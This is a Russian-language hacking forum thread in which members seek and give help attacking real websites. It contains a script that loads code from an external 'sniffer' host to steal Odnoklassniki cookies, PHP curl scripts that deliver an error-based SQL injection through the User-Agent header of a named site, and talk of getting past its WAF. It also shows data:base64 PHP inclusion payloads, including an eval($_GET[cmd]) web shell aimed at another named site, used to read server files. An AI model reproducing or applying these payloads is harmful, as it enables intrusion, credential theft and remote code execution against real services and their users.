Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. djhovo09

    djhovo09 New Member

    Joined:
    2 Jul 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер

    <div id="ok_group_widget"></div>
    <script>
    !function (d, id, did, st) {
    var js = d.createElement("script");
    js.src = "http://snifer.ejan.ru/connect.js";
    js.onload = js.onreadystatechange = function () {
    if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
    this.executed = true;
    setTimeout(function () {
    OK.CONNECT.insertGroupWidget(id,did,st);
    }, 0);
    }
    }}
    d.documentElement.appendChild(js);
    }(document,"ok_group_widget","52864984219766","{width:250,height:335}");


    </script>
     
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    Нашел скуль в User-Agent, запросы через GET обрубаются

    <h1>Forbidden</h1>
    <p>You don't have permission to access on this server.</p>

    поделитесь скриптом на php, для передачи User-Agent в Post-запросе. Сам написать не могу, знаний маловато
     
    #22662 er9j6@, 25 Oct 2013
    Last edited: 25 Oct 2013
  3. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23

    нужен скрипт на php, в этих прогах скулю в User-Agent постом не получается передать
     
  4. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах.


    PHP:
    <?php
    $curl 
    curl_init('http://site.ru/'); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    curl_setopt($curlCURLOPT_POST1);
    curl_setopt($curlCURLOPT_USERAGENT'Firefox(user-agent)');
    echo 
    curl_exec($curl);
    ?>
    ПС Но похоже тебе это не поможет :(
     
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    как сюда уязвимый запрос правильно вставить?

    <?php
    $curl = curl_init('http://www.site.ru/');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_USERAGENT, ''and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'');
    echo curl_exec($curl);
    ?>
     
  6. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Верно. Я пропустил одну строчку в оригинале =(

    PHP:
    <?php
    $curl 
    curl_init('http://localhost/phpinfo.php'); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
    curl_setopt($curlCURLOPT_POST1); 
    curl_setopt($curlCURLOPT_POSTFIELDS"");
    curl_setopt($curlCURLOPT_USERAGENT'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and');
    echo 
    curl_exec($curl);
    ?>
    Попробуй так
     
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    Скрипт работает правильно, но версию не выводит, хотя при GET запросе вывод есть Duplicate column name '5.1.68-log' , дальше продвинутся не удается , все фильтруется. Выводить таблицы нужно через POST-запрос
     
  8. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent.

    Если тебе нужно отправить какие-то параметры POST'ом то
    Если это всё не то, то приведи пример запроса.
     
  9. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    390
    Likes Received:
    39
    Reputations:
    23
    Выкладываю

    GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1
    Host: www.guppik.ru
    User-Agent: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'


    теперь нужно это переделать под POST-запрос, для вывода таблиц
     
  10. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Ок, теперь всё ясно. Ещё раз повторю что User-Agent это заголовок, POST/GET на него не влияют. В данном случае WAF/IPS/... режет запросы в которых есть совпадение '*informa*'. Я минут десять потыкался, но рабочего варианта послать information_schema в User-Agent не нашёл.
     
    1 person likes this.
  11. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    И снова вопрос по site/account?mode==data:;base64,<?php include("http://site/path/file.*"); ?> с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php
     
    #22671 noviks, 26 Oct 2013
    Last edited: 26 Oct 2013
  12. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    site/account?mode==data:;base64,<?php echo file_get_contents("http://site/path/file.php"); ?>

    PS Только сейчас понял, путь-то надо указывать не с веба, а локальный. По типу:

    site/account?mode==data:;base64,<?php echo file_get_contents("/var/www/path/file.php"); ?>
     
    #22672 Ganz Euler, 26 Oct 2013
    Last edited: 26 Oct 2013
  13. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    работает что так <?php echo file_get_contents("http://site/path/file.php"); ?>
    что так <?php echo file_get_contents("/var/www/path/file.php"); ?>
    но файлы php не xочет показать
     
  14. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Что значит не хочет? Что пишет?
     
  15. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    ничего не пишет просто страница до конца не открывается и пусто
     
  16. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '<?').
     
  17. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    :D я об зтом сразу подумал, HTML код просто обрывается
     
  18. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    открыл /bin/sh но там одни крокозябры
     
  19. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    47
    Likes Received:
    12
    Reputations:
    10
    Неудивительно, /bin/sh бинарный файл.

    Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
     
  20. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    она уже и не работает ,вчера зря спалил :D
     
Thread Status:
Not open for further replies.